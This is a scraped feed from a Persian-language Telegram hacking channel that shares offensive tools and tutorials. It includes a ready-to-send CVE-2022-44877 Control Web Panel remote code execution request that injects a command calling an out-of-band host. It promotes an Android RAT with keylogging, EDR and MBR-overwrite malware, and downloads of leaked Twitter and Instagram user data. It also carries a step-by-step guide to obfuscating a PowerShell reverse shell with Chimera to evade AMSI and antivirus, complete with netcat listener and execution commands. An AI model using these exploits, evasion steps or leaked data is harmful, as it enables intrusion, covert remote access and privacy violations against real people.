0Day.Today | Learn Exploit | Zero World | Dark web |
19.3K subscribers
1.23K photos
127 videos
489 files
1.28K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
​​Burp Extension - IpLogger

Github

#burp #burpsuite
——————‌
0Day.Today
@LearnExploit
@Tech_Army
4
Bypass MAC filter

#bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army
سلام خدمت دوستان عزیز ✌️

به گروه کانال LearnExploit جوین بدید📿

🚫 قوانین
:

1 - لطفا سوالات و پاسخ خودتون رو در حد امکان در یک پیام بفرستید.
2 - ارسال مطالب هماهنگ با موضوع چنل.
3 - در صورت زیر سوال بردن هرگونه نژاد بدون استثنا از گروه حذف میشوید.
4 - بحث سیاسی داخل گپ ممنوع .

+ برای حمایت از ما و کانال ، لطفا مطالب کانال رو نشر دهید .

با تشکر ادمین گروه آموزشی LearnExploit

کانال LearnExploit :
📎 @LearnExploit
🤠 IR0Day.Today Boy's

لینک گروه LearnExploit :
🗣 @LearnExploit_Group
4👎2🍾1
SpoolSploit

A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.

Github

#exploit #windows #tools
——————‌
0Day.Today
@LearnExploit
@Tech_Army
5
اطلاعات 235 میلیون یوزر توییتر به صورت عمومی منتشر شد .

اطلاعات 235 میلیون یوزر توییتر که شامل ایمیل و نام کاربری آن ها توسط هکرها در انجمن Breached به صورت عمومی منتشر شد .

این دیتا حدود 63 گیگ حجم داره و میتونین اون رو از خود این انجمن دانلود کنید .

breached.vc

#Leak #twitter
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👌9👎4🤔21👍1
پروکسی به واتس‌اپ اضافه شد .

مدیر واتس‌اپ در متا اعلام کرد ویژگی پروکسی به واتس‌اپ اضافه شد.

#whatsapp
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍10👎2😁2❤‍🔥1
CVE-2022-44877

Centos Web Panel 7 Unauthenticated Remote Code Execution

Github

#rce
——————‌
0Day.Today
@LearnExploit
@Tech_Army
0Day.Today | Learn Exploit | Zero World | Dark web |
آموزش رت اندرویدی Cypher Rat #android #rat —————— 0Day.Today @LearnExploit @Tech_Army
نسخه جدید Cypher Rat V3.5

+ [FIX] Rename Client
+ [FIX] Edit Connection info
+ [FIX] Apk not open on some MIUI Phones
+ [Update] Better & Faster Keylogger
+ [Update] injection works with more apps
+ [Update] Screen Monitor Faster
+ [New] Enable/Disable Any App

Download

Github

#rat #android
——————
0Day.Today
@LearnExploit
@Tech_Army
👍72👎1👏1🍾1
گروه هکری Ares اطلاعات 500 هزار ایرانی اینستاگرام رو منتشر کرد .

این اطلاعات شامله نام و نام کاربری و شماره تلفن هست .

Download

Ares Telegram Channel

#instagram #Leak
——————‌
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥82
Photoshop CC v19 installer for Linux

Github

#Linux #tools
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍8👎1
FilelessNtdllReflection ( Bypass Userland EDR )

Github

#bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army
CVE-2022-44877

Control Web Panel Unauth RCE

usage :
POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1
Host: vuln
Content-Type: application/x-www-form-urlencoded

username=root&password=toor&commit=Login

#RCE #CVE
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍11🔥2
C/C++ Memory Hacking -- OverWrite MBR

https://youtu.be/2Gfmw_6sYz4

#Malware #MBR #Virus
——————‌
0Day.Today
@LearnExploit
@Tech_Army
This media is not supported in your browser
VIEW IN TELEGRAM
[ Tags ]
#Malware #Bypass #AMSI #AntiVirus #Chimera #Script

آموزش ابزار Obfuscate ) Chimera کردن اسکریپت های پاورشل برای بایپس AMSI و Anti Virus ها )

IR0Day.Today Bax
@LearnExploit
@Tech_Army
7
0Day.Today | Learn Exploit | Zero World | Dark web |
[ Tags ] #Malware #Bypass #AMSI #AntiVirus #Chimera #Script آموزش ابزار Obfuscate ) Chimera کردن اسکریپت های پاورشل برای بایپس AMSI و Anti Virus ها ) IR0Day.Today Bax @LearnExploit @Tech_Army
ابزار Chimera ابزاری برای Obfuscate کردن اسکریپ های پاورشل برای بایپس AMSI ( Anti Malware Scan Interface ) و انتی ویروس ها هست.

تیکه کد زیر بخشی از Invoke-PowerShellTCP.ps1 هست که توسط 25 تا از انتی ویروس ها شناسایی شده : ( مشاهده عکس )

$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`n Copyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)

اما تیکه کد زیر بعد از Obfuscate کردن کد بالا توسط ابزار Chimera هست که هیچ آنتی ویروسی نتونسته تشخیص بده : ( مشاهده عکس )

$xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov = $jYODNAbvrcYMGaAnZHZwE."$bnyEOfzNcZkkuogkqgKbfmmkvB$ZSshncYvoHKvlKTEanAhJkpKSIxQKkTZJBEahFz$KKApRDtjBkYfJhiVUDOlRxLHmOTOraapTALS"()
[bYte[]]$mOmMDiAfdJwklSzJCUFzcUmjONtNWN = 0..65535|%{0}
$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK = ([teXt.enCoDInG]::AsCII)."$mbKdotKJjMWJhAignlHUS$GhPYzrThsgZeBPkkxVKpfNvFPXaYNqOLBm"("WInDows Powershell rUnnInG As User " + $TgDXkBADxbzEsKLWOwPoF:UsernAMe + " on " + $TgDXkBADxbzEsKLWOwPoF:CoMPUternAMe + "`n CoPYrIGht (C) 2015 MICrosoft CorPorAtIon. All rIGhts reserveD.`n`n")
$xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov.WrIte($PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK,0,$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK.LenGth)


نحوه ی نصب در Linux :
1. نصب پیش نیاز ها :
sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git

2. کلون کردن ریپو :
sudo git clone https://github.com/tokyoneon/chimera /opt/chimera

3. تغییر سطح دسترسی اسکریپت به روت ( اگرکاربر روت نیستید ) :
sudo chown root:root -R /opt/chimera/

4. تغییر مسیر به opt/chimera/ :
cd /opt/chimera/

5. تغییر دسترسی اسکریپت به قابلیت اجرا شدن :
sudo chmod +x chimera.sh

6. نهایتا با دستور زیر میتونید اسکریپت رو اجراکنید :
./chimera.sh —help

نحوه ی استفاده از اسکریپت :
1. ساخت Payload :
./chimera --file Shell_Code.ps1 --all --output /tmp/payload.ps1

2. جایگزین کردن ListenerIP/TargetIP و ListenerPort/TargetPort در داخل پیبود :
1.2 تغییر ایپی :
sed -i 's/Listener_IP/Target_IP/g' shells/Payload.ps1
2.2 تغییر پورت :
پورت دیفالت اسکریپت 444 هستش :
sed -i 's/4444/Target_Port/g' shells/*.ps1

گرفتن دسترسی :
1. ایجاد Listener در لینوکس با NetCat :
nc -v -l -p 4444
2. فایل رو روی پاورشل ویندوز با دستور زیر اجرا کنید :
powershell.exe -ep bypass C:\<PATH>\Payload.ps1

و تمام.
امیدوارم از آموزش خوشتون بیاد...
Author : X P 4
Special Tnx to : AK47

IR0Day.Today Bax
@LearnExploit
@Tech_Army
6👍3❤‍🔥2